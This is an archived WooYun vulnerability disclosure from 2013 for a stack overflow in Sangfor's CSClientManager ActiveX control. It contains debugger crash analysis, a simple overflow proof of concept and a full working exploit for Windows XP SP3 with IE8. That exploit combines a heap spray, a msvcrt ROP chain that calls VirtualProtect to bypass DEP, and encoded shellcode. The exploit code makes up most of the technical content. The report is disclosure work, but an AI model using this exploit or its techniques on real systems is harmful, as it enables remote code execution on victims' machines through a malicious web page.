破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

#4 Sangfor CSClientManager Activex Remote Code Execution bypass dep on ie8

编号43078
Urlhttp://www.wooyun.org/bug.php?action=view&id=43078
漏洞状态厂商已经确认
漏洞标题#4 Sangfor CSClientManager Activex Remote Code Execution bypass dep on ie8
漏洞类型远程代码执行
厂商深信服
白帽子想要减肥的胖纸
提交日期2013-11-16 17:00:00
公开日期2014-02-14 17:01:00
修复时间(not set)
确认时间2013-11-18 00:00:00
Confirm Spend2
漏洞标签远程代码执行 activex漏洞
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank8
漏洞简介
[+] Looking for cyclic pattern in memory
    Cyclic pattern (normal) found at 0x03750630 (length 1000 bytes)
    Cyclic pattern (normal) found at 0x03750e66 (length 1000 bytes)
    Cyclic pattern (normal) found at 0x03df203d (length 1000 bytes)
    Cyclic pattern (normal) found at 0x03e54d1d (length 1000 bytes)
    Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes)
    Cyclic pattern (unicode) found at 0x03745da4 (length 252 bytes)
    Cyclic pattern (unicode) found at 0x03747e38 (length 1996 bytes)
    Cyclic pattern (unicode) found at 0x03748d2e (length 999 bytes)
    Cyclic pattern (unicode) found at 0x0407063a (length 999 bytes)
    Cyclic pattern (unicode) found at 0x040c6236 (length 999 bytes)
    Cyclic pattern (unicode) found at 0x040c6a64 (length 1996 bytes)
    Cyclic pattern (unicode) found at 0x03e09bce (length 999 bytes)
    EIP overwritten with normal pattern : 0x67413367 (offset 190)
    ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802)
    EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746)
[+] Examining SEH chain
    SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data
漏洞细节

该漏洞控件源自深信服官方渠道登录,请对其升级,看版本应该是新版的?6.0,之前的漏洞是4.X版本的

名称:         CSClientManager Class
发行者: Sangfor Technologies Co.,Ltd
类型: ActiveX 控件
版本: 6. 0. 0. 0
文件日期:
上次访问日期: 2013年11月16日,14:51
类 ID: {D257CF85-8E97-4C9B-8407-459B28006000}
使用计数: 118
阻止次数: 0
文件: CSClientManagerPrj.dll
文件夹: C:\Program Files\Sangfor\SSL\ClientComponent3


[+] Looking for cyclic pattern in memory
Cyclic pattern (normal) found at 0x03750630 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03750e66 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03df203d (length 1000 bytes)
Cyclic pattern (normal) found at 0x03e54d1d (length 1000 bytes)
Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes)
Cyclic pattern (unicode) found at 0x03745da4 (length 252 bytes)
Cyclic pattern (unicode) found at 0x03747e38 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03748d2e (length 999 bytes)
Cyclic pattern (unicode) found at 0x0407063a (length 999 bytes)
Cyclic pattern (unicode) found at 0x040c6236 (length 999 bytes)
Cyclic pattern (unicode) found at 0x040c6a64 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03e09bce (length 999 bytes)
EIP overwritten with normal pattern : 0x67413367 (offset 190)
ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802)
EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746)
[+] Examining SEH chain
SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data

POC

<html>
<object classid='clsid:D257CF85-8E97-4C9B-8407-459B28006000' id='target' ></object>
<script >
junk1 = "";
while(junk1.length < 190) junk1+="A";
eip = "BBBB";
junk2 = "CCCCCCCCCCCCCCCCCCCC";
nseh = "DDDD";
seh ="EEEE";
junk3 = "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF";
payload = junk1 + eip + junk2 + nseh + seh + junk3;
target.checkRelogin(payload);
</script>
</html>


QQ20131116-1@2x.png


test on win xp spy ie8
rop bypass dep

<html>
<head>
<title>Sangfor Activex stack overflow PoC bypass dep on xpsp3 ie8</title>
</head>
<body>
<!--[+] Looking for cyclic pattern in memory
Cyclic pattern (normal) found at 0x03710440 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03710c76 (length 1000 bytes)
Cyclic pattern (normal) found at 0x00188a88 (length 16 bytes)
Cyclic pattern (normal) found at 0x03dedc28 (length 1000 bytes)
Cyclic pattern (normal) found at 0x03e52d10 (length 1000 bytes)
Cyclic pattern (normal) found at 0x016ad0ee (length 1000 bytes)
Cyclic pattern (unicode) found at 0x0409d632 (length 999 bytes)
Cyclic pattern (unicode) found at 0x040d6236 (length 999 bytes)
Cyclic pattern (unicode) found at 0x040d6a64 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03705d6c (length 252 bytes)
Cyclic pattern (unicode) found at 0x03707e00 (length 1996 bytes)
Cyclic pattern (unicode) found at 0x03708cf6 (length 999 bytes)
Cyclic pattern (unicode) found at 0x03e05fb4 (length 999 bytes)
EIP overwritten with normal pattern : 0x67413367 (offset 190)
ESP (0x016ad1b4) points at offset 198 in normal pattern (length 802)
EBP (0x016ad1ec) points at offset 254 in normal pattern (length 746)
[+] Examining SEH chain
SEH record (nseh field) at 0x016ad1c4 overwritten with normal pattern : 0x33684132 (offset 214), followed by 782 bytes of cyclic data
[+] Examining stack (entire stack) - looking for cyclic pattern
Walking stack from 0x0168f000 to 0x016afffc (0x00020ffc bytes)
0x016ad0f0 : Contains normal cyclic pattern at ESP-0xc4 (-196) : offset 2, length 998 (-> 0x016ad4d5 : ESP+0x322)
-->
<object classid="clsid:D257CF85-8E97-4C9B-8407-459B28006000" id='poc'></object>
<script>
// [ Shellcode ]
var shellcode = unescape('%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063');
var rop_chain = //"\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4B\u77BE" + // 0x77BEBE4B # pop ebp # retn [msvcrt.dll]
// "\u5ED5\u77BE" + // 0x77BE5ED5 # xchg eax, esp # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// "\uBE4C\u77BE" + // 0x77BEBE4C # retn [msvcrt.dll]
// The real rop chain
"\ube4b\u77be" + // 0x77bebe4b : ,# POP EBP # RETN [msvcrt.dll]
"\ube4b\u77be" + // 0x77bebe4b : ,# skip 4 bytes [msvcrt.dll]
"\u6e9d\u77c1" + // 0x77c16e9d : ,# POP EBX # RETN [msvcrt.dll]
"\uE000\u0000" + // 0x0000E000 : ,# 0x0000E000-> ebx [dwSize]
"\ucdec\u77c1" + // 0x77c1cdec : ,# POP EDX # RETN [msvcrt.dll]
"\u0040\u0000" + // 0x00000040 : ,# 0x00000040-> edx
"\u79da\u77bf" + // 0x77bf79da : ,# POP ECX # RETN [msvcrt.dll]
"\uf67e\u77c2" + // 0x77c2f67e : ,# &Writable location [msvcrt.dll]
"\uaf6b\u77c0" + // 0x77c0af6b : ,# POP EDI # RETN [msvcrt.dll]
"\u9f92\u77c0" + // 0x77c09f92 : ,# RETN (ROP NOP) [msvcrt.dll]
"\u6f5a\u77c1" + // 0x77c16f5a : ,# POP ESI # RETN [msvcrt.dll]
"\uaacc\u77bf" + // 0x77bfaacc : ,# JMP [EAX] [msvcrt.dll]
"\u289b\u77c2" + // 0x77c2289b : ,# POP EAX # RETN [msvcrt.dll]
"\u1131\u77be" + // 0x77BE1131 : ,# ptr to &VirtualProtect() [IAT msvcrt.dll] 0x20-0xEF=0x31
"\u67f0\u77c2" + // 0x77c267f0 : ,# PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
"\u1025\u77c2"; // 0x77c21025 : ,# ptr to 'push esp # ret ' [msvcrt.dll]
// [ fill the heap with 0x0c0c0c0c ] About 0x2000 Bytes
var fill = "\u0c0c\u0c0c";
while (fill.length < 0x1000){
fill += fill;
}
// [ padding offset ]
padding = fill.substring(0, 0x5F6);
// [ fill each chunk with 0x1000 bytes ]
evilcode = padding + rop_chain + shellcode + fill.substring(0, 0x800 - padding.length - rop_chain.length - shellcode.length);
// [ repeat the block to 512KB ]
while (evilcode.length < 0x40000){
evilcode += evilcode;
}
// [ substring(2, 0x40000 - 0x21) - XP SP3 + IE8 ]
var block = evilcode.substring(2, 0x40000 - 0x21);
// [ Allocate 200 MB ]
var slide = new Array();
for (var i = 0; i < 400; i++){
slide[i] = block.substring(0, block.length);
}
var junk = '';
while(junk.length<190) junk += 'A';
popeax = "\x28\x7b\x71\x7d";// 0x7d717b28 {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.6242 (C:\WINDOWS\system32\SHELL32.dll)
xchg = "\x79\x68\x44\x3e"; //0x3e446879 {PAGE_EXECUTE_READ} [WININET.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v8.00.6001.19394 (C:\WINDOWS\system32\WININET.dll)
str = "\x0c\x0c\x0c\x0c";
payload = junk + popeax + str +str +xchg;
poc.checkRelogin(payload);
</script>
</body>
</html>


QQ20131116-2@2x.png

修复方案

状态信息 2013-11-16: 细节已通知厂商并且等待厂商处理中
2013-11-18: 厂商已经确认,细节仅向厂商公开
2013-11-21: 细节向第三方安全合作伙伴开放
2014-01-12: 细节向核心白帽子及相关领域专家公开
2014-01-22: 细节向普通白帽子公开
2014-02-01: 细节向实习白帽子公开
2014-02-14: 细节向公众公开
厂商回复
回应信息危害等级:中漏洞Rank:8 确认时间:2013-11-18 16:53
Showing 1-5 of 5 items.
评论内容评论人点赞数评论时间

@超威蓝猫 一个是代码执行 一个是命令执行吧 不一样的

VIP02013-11-16 20:53:00

remote code execution? 不是remote command execution吗..

超威蓝猫02013-11-16 17:13:00

@NetSeif +1=。=

剑无名02013-11-16 17:05:00

看名字还以为到乌云国际了...

NetSeif02013-11-16 17:02:00

乌云国际这名字听起来霸气啊...微软中国...谷歌中国...乌云国际...霸气!!!!!!

NetSeif02013-11-16 17:02:00